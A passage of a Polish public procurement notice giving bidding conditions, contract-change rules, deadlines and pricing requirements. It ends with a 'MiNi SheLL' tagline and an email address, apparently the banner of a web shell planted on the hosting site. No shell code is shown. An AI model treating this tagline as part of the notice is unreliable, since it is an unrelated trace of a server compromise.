etykiety oferowanych produktów wraz z wykazem, z którego jednoznacznie musi<br/>wynikać, którego z zaproponowanych produktów w zestawieniu dotyczy dana etykieta.<br/>d. Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane<br/>w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca wraz z<br/>przekazaniem takich informacji zastrzega, że nie mogą być one udostępniane, oraz wykazuje,<br/>że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy<br/>z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji.<br/>Wymagana forma:<br/>Dokument musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą<br/>reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub<br/>innym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia warunek udziału w postępowaniu dotyczący zdolności<br/>technicznej lub zawodowej spełniają łącznie.<br/>4. Zgodnie z treścią art. 117 ust. 2 Pzp warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, o którym mowa w pkt 2 powyżej, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej. W takim przypadku Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, który z Wykonawców<br/>realizować będzie przedmiot zamówienia wg wzoru stanowiącego Załącznik nr 5 do SWZ.<br/>5. Zgodnie z art. 118 ust. 3 Pzp Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów<br/>na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>7. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana umowy jest możliwa w przypadku:<br/>1) wycofania z dystrybucji przedmiotu umowy i zastąpienia go produktem o parametrach nie<br/>gorszych niż oferowany, za cenę taką jaka została ustalona w niniejszej umowie,<br/>2) zmiany ustawowej stawki podatku VAT,<br/>3) zmiany osób upoważnionych do kontaktów w/s realizacji umowy wskazanych w § 3 projektu<br/>umowy.<br/>2. Zmiana umowy jest możliwa: jeżeli konieczność zmiany umowy spowodowana jest<br/>okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć,<br/>o ile zmiana nie modyfikuje ogólnego charakteru umowy.<br/>3. Wszelkie zmiany na rynku uzasadniające zmianę cen, a których nie można było przewidzieć<br/>w chwili zawierania umowy dokonywane będą w formie pisemnej, nie wcześniej jednak niż po<br/>upływie 3 miesięcy od daty jej podpisania. Cena artykułu może podlegać zmianie w stopniu<br/>odpowiadającym kwartalnemu wskaźnikowi wzrostu cen towarów i usług konsumpcyjnych, licząc<br/>od następnego miesiąca po miesiącu, w którym wskaźnik ten został ogłoszony przez Prezesa<br/>GUS.<br/>4. Zmiana niniejszej umowy wymaga formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem platformy https://platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-15 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami<br/>ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na<br/>podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia.<br/>2. Rozliczenia będą prowadzone w złotych polskich z dokładnością do dwóch miejsc po<br/>przecinku.<br/>UWAGA! Jeden grosz jest najmniejszą jednostką monetarną w systemie pieniężnym RP i nie<br/>jest możliwe wyliczenie ceny końcowej, jeśli komponenty ceny (ceny jednostkowe) są określone<br/>za pomocą wielkości mniejszych niż 1 grosz. Wartości kwotowe ujęte jako wielkości<br/>matematyczne znajdujące się na trzecim i kolejnym miejscu po przecinku, w odniesieniu do<br/>nieistniejącej wielkości w polskim systemie monetarnym powodują, że tak wyrażona cena usługi<br/>dla powszechnego obrotu gospodarczego jest niemożliwa do wypłacenia. Nie można kogoś<br/>realnie zobowiązać do zapłaty na jego rzecz kwoty<br/>niższej niż jeden grosz. Tym samym, ceny jednostkowe, stanowiące podstawę do obliczenia<br/>ceny oferty, muszą być podane z dokładnością do dwóch miejsc po przecinku. Jeżeli oferta<br/>będzie zawierała ceny<br/>jednostkowe wyrażone jako wielkości matematyczne znajdujące się na trzecim i kolejnym<br/>miejscu po przecinku, zostanie odrzucona na podstawie art. 226 ust. 1 pkt 4 i 5 ustawy Pzp.<br/>3. Wykonawca zobowiązany jest zastosować stawkę VAT zgodnie z obowiązującymi przepisami<br/>ustawy z 11 marca 2004 r. o podatku od towarów i usług.<br/>4. Wykonawca podaje w ofercie cenę/koszt całego zamówienia dołączając do oferty wypełniony<br/>załącznik nr 2 &#34;zestawienie ilościowo wartościowe&#34;.<br/>5. Cenę oferty należy określić z należytą starannością, na podstawie przedmiotu zamówienia z<br/>uwzględnieniem wszystkich kosztów związanych z realizacją zadania wynikających z zakresu<br/>dostawy i doliczyć do powstałej kwoty inne składniki wpływające na ostateczną cenę. Jeżeli<br/>Wykonawca ma zamiar zaproponować jakieś rabaty lub upusty cen, powinien je od razu ująć w<br/>obliczeniach ceny, tak aby wyliczona cena za realizację zamówienia była ceną<br/>całościową. Proponowana cena łączna powinna być podana w wysokości ostatecznej, tak aby<br/>Zamawiający nie musiał już dokonywać żadnych obliczeń, przeliczeń itp. działań w celu jej<br/>określenia.<br/>6. W formularzu oferty wypełnianym za pośrednictwem Platformy wykonawca poda wyłącznie<br/>cenę oferty, która uwzględnia całkowity koszt realizacji zamówienia w okresie obowiązywania<br/>umowy obliczoną zgodnie z powyższymi dyspozycjami.<br/>Podział zamówienia na części<br/>Podział na części mógłby spowodować nadmierne koszty wykonania<br/>zamówienia, w tym wzrost cen. Jednocześnie decyzja o braku podziału na części nie narusza<br/>konkurencji poprzez ograniczenie możliwości ubiegania się o zamówienie mniejszympodmiotom, w szczególności małym i średnim przedsiębiorstwom.<br/>Informacje o formalnościach, jakie powinny zostać dopełnione po wyborze oferty w celu<br/>zawarcia umowy w sprawie zamówienia publicznego<br/>1. Zamawiający poinformuje wykonawcę, któremu zostanie udzielone zamówienie, o miejscu i<br/>terminie zawarcia umowy.<br/>2. Wykonawca przed zawarciem umowy poda wszelkie informacje niezbędne do wypełnienia<br/>treści umowy na wezwanie Zamawiającego.<br/>3. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców, w której m.in. zostanie<br/>określony pełnomocnik uprawniony do kontaktów z Zamawiającym oraz do wystawiania<br/>dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie<br/>może być krótszy niż termin realizacji zamówienia.<br/>4. Niedopełnienie powyższych formalności przez wybranego wykonawcę będzie potraktowane<br/>przez Zamawiającego jako niemożność zawarcia umowy w sprawie zamówienia publicznego z<br/>przyczyn leżących po stronie wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com